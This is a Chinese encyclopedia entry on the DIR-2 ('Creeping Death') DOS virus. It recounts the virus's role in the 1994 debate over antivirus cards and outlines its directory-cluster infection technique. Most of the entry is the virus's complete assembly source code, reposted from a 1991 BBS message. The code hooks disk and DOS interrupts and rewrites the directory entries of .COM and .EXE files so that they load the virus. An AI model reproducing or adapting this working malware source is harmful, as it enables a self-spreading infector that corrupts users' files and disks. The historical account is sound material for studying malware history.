词条 | DIR2病毒 |
释义 | 介绍一个可以 媲美CIH的病毒,不具有以往人们认定病毒的明显特征,它改写了DOS系统,使自己不被发现,但它确确实实是一个病毒。 事件1994年前后,瑞星公司推出了防病毒卡。是用防毒卡好,还是用防毒软件好?是当时人们争论的热点之一。防病毒卡插在电脑里,由于不可改写,没有病毒感染的危险,但能否防住未知病毒却没有定论。防病毒卡的生产厂家认为能够找到病毒的最基本特征,就能够防住所有已知和未知的病毒。 DIR2 病毒的出现彻底打破了防病毒卡公司的防线,它不具有以往人们认定病毒的明显特征,它改写了DOS系统,使自己不被发现,但它确确实实是一个病毒。 于是,防病毒卡一落千丈,而王江民的 KV300系列却脱颖而出,以其开放性和快速更新成为杀病毒市场上的盟主。 原理这种病毒在感染形式和自身结构上与以往引导区型、宿文件型病毒大不相同。该病毒在软硬盘中占据小于33兆硬盘最后一个簇的区域。但是,对当今快速发展的各种大容量硬盘,该病毒就计算错误,乱感染一通,很难解除。病毒实际上长度为1024、2048字节。病毒通过DIR或其它读写盘命令将当前盘中所有.COM和.EXE文件目录登记项中的首簇数修改为病毒认为是磁盘最后一个簇数,这个簇数指向的位置就是病毒在盘中隐藏的位置。 源代码=========================================================================== BBS: The Programmer"s Inn Date: 11-24-91 (19:52) Number: 3544 From: AHMED DOGAN Refer#: NONE To: ALL Recvd: NO Subj: DIR-2 Conf: (16) VIRUS --------------------------------------------------------------------------- ; Creeping Death V 1.0 ; ; (C) Copyright 1991 by VirusSoft Corp. i13org = 5f8h i21org = 5fch org 100h mov sp,600h inc counter xor cx,cx mov ds,cx lds ax,[0c1h] add ax,21h push ds push ax mov ah,30h call jump cmp al,4 sbb si,si mov drive+2,byte ptr -1 mov bx,60h mov ah,4ah call jump mov ah,52h call jump push es:[bx-2] lds bx,es:[bx] search: mov ax,[bx+si+15h] cmp ax,70h jne next xchg ax,cx mov [bx+si+18h],byte ptr -1 mov di,[bx+si+13h] mov [bx+si+13h],offset header mov [bx+si+15h],cs next: lds bx,[bx+si+19h] cmp bx,-1 jne search jcxz install pop ds mov ax,ds add ax,[3] inc ax mov dx,cs dec dx cmp ax,dx jne no_boot add [3],61h no_boot: mov ds,dx mov [1],8 mov ds,cx les ax,[di+6] mov cs:str_block,ax mov cs:int_block,es cld mov si,1 scan: dec si lodsw cmp ax,1effh jne scan mov ax,2cah cmp [si+4],ax je right cmp [si+5],ax jne scan right: lodsw push cs pop es mov di,offset modify+1 stosw xchg ax,si mov di,offset i13org cli movsw movsw mov dx,0c000h fdsk1: mov ds,dx xor si,si lodsw cmp ax,0aa55h jne fdsk4 cbw lodsb mov cl,9 sal ax,cl fdsk2: cmp [si],6c7h jne fdsk3 cmp [si+2],4ch jne fdsk3 push dx push [si+4] jmp short death install: int 20h file : db "c:",255,0 fdsk3: inc si cmp si,ax jb fdsk2 fdsk4: inc dx cmp dh,0f0h jb fdsk1 sub sp,4 death: push cs pop ds mov bx,[2ch] mov es,bx mov ah,49h call jump xor ax,ax test bx,bx jz boot mov di,1 seek: dec di scasw jne seek lea si,[di+2] jmp short exec boot: mov es,[16h] mov bx,es:[16h] dec bx xor si,si exec: push bx mov bx,offset param mov [bx+4],cs mov [bx+8],cs mov [bx+12],cs pop ds push cs pop es mov di,offset f_name push di mov cx,40 rep movsw push cs pop ds mov ah,3dh mov dx,offset file call jump pop dx mov ax,4b00h call jump mov ah,4dh call jump mov ah,4ch jump: pushf call dword ptr cs:[i21org] ret ;--------Installation complete i13pr: mov ah,3 jmp dword ptr cs:[i13org] main: push ax ; driver push cx ; strategy block push dx push ds push si push di push es pop ds mov al,[bx+2] cmp al,4 ; Input je input cmp al,8 je output cmp al,9 je output call in cmp al,2 ; Build BPB jne ppp ; lds si,[bx+12h] mov di,offset bpb_buf mov es:[bx+12h],di mov es:[bx+14h],cs push es push cs pop es mov cx,16 rep movsw pop es push cs pop ds mov al,[di+2-32] cmp al,2 adc al,0 cbw cmp [di+8-32],0 je m32 sub [di+8-32],ax jmp short ppp m32: sub [di+15h-32],ax sbb [di+17h-32],0 ppp: pop di pop si pop ds pop dx pop cx pop ax rts: retf output: mov cx,0ff09h call check jz inf_sec call in jmp short inf_dsk inf_sec: jmp _inf_sec read: jmp _read read_: add sp,16 jmp short ppp input: call check jz read inf_dsk: mov byte ptr [bx+2],4 cld lea si,[bx+0eh] mov cx,8 save: lodsw push ax loop save mov [bx+14h],1 call driver jnz read_ mov byte ptr [bx+2],2 call in lds si,[bx+12h] mov ax,[si+6] add ax,15 mov cl,4 shr ax,cl mov di,[si+0bh] add di,di stc adc di,ax push di cwd mov ax,[si+8] test ax,ax jnz more mov ax,[si+15h] mov dx,[si+17h] more: xor cx,cx sub ax,di sbb dx,cx mov cl,[si+2] div cx cmp cl,2 sbb ax,-1 push ax call convert mov byte ptr es:[bx+2],4 mov es:[bx+14h],ax call driver again: lds si,es:[bx+0eh] add si,dx sub dh,cl adc dx,ax mov cs:gad+1,dx cmp cl,1 je small mov ax,[si] and ax,di cmp ax,0fff7h je bad cmp ax,0ff7h je bad cmp ax,0ff70h jne ok bad: pop ax dec ax push ax call convert jmp short again small: not di and [si],di pop ax push ax inc ax push ax mov dx,0fh test di,dx jz here inc dx mul dx here: or [si],ax pop ax call convert mov si,es:[bx+0eh] add si,dx mov ax,[si] and ax,di ok: mov dx,di dec dx and dx,di not di and [si],di or [si],dx cmp ax,dx pop ax pop di mov cs:pointer+1,ax je _read_ mov dx,[si] push ds push si call write pop si pop ds jnz _read_ call driver cmp [si],dx jne _read_ dec ax dec ax mul cx add ax,di adc dx,0 push es pop ds mov [bx+12h],2 mov [bx+14h],ax test dx,dx jz less mov [bx+14h],-1 mov [bx+1ah],ax mov [bx+1ch],dx less: mov [bx+10h],cs mov [bx+0eh],100h call write _read_: std lea di,[bx+1ch] mov cx,8 load: pop ax stosw loop load _read: call in mov cx,9 _inf_sec: mov di,es:[bx+12h] lds si,es:[bx+0eh] sal di,cl xor cl,cl add di,si xor dl,dl push ds push si call find jcxz no_inf call write and es:[bx+4],byte ptr 07fh no_inf: pop si pop ds inc dx call find jmp ppp ;--------Subroutines find: mov ax,[si+8] cmp ax,"XE" jne com cmp [si+10],al je found com: cmp ax,"OC" jne go_on cmp byte ptr [si+10],"M" jne go_on found: test [si+1eh],0ffc0h ; >4MB jnz go_on test [si+1dh],03ff8h ; <2048B jz go_on test [si+0bh],byte ptr 1ch jnz go_on test dl,dl jnz rest pointer: mov ax,1234h cmp ax,[si+1ah] je go_on xchg ax,[si+1ah] gad: xor ax,1234h mov [si+14h],ax loop go_on rest: xor ax,ax xchg ax,[si+14h] xor ax,cs:gad+1 mov [si+1ah],ax go_on: ;rol cs:gad+1,1 db 2eh,0d1h,6 dw offset gad+1 add si,32 cmp di,si jne find ret check: mov ah,[bx+1] drive: cmp ah,-1 mov cs:[drive+2],ah jne changed push [bx+0eh] mov byte ptr [bx+2],1 call in cmp byte ptr [bx+0eh],1 pop [bx+0eh] mov [bx+2],al changed: ret write: cmp byte ptr es:[bx+2],8 jae in mov byte ptr es:[bx+2],4 mov si,70h mov ds,si modify: mov si,1234h push [si] push [si+2] mov [si],offset i13pr mov [si+2],cs call in pop [si+2] pop [si] ret driver: mov es:[bx+12h],1 in: db 09ah str_block: dw ?,70h db 09ah int_block: dw ?,70h test es:[bx+4],byte ptr 80h ret convert: cmp ax,0ff0h jae fat_16 mov si,3 xor cs:[si+gad-1],si mul si shr ax,1 mov di,0fffh jnc cont mov di,0fff0h jmp short cont fat_16: mov si,2 mul si mov di,0ffffh cont: mov si,512 div si header: inc ax ret counter: dw 0 dw 842h dw offset main dw offset rts db 7fh param: dw 0,80h,?,5ch,?,6ch,? bpb_buf: db 32 dup(?) f_name: db 80 dup(?) ;--------The End. |
随便看 |
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。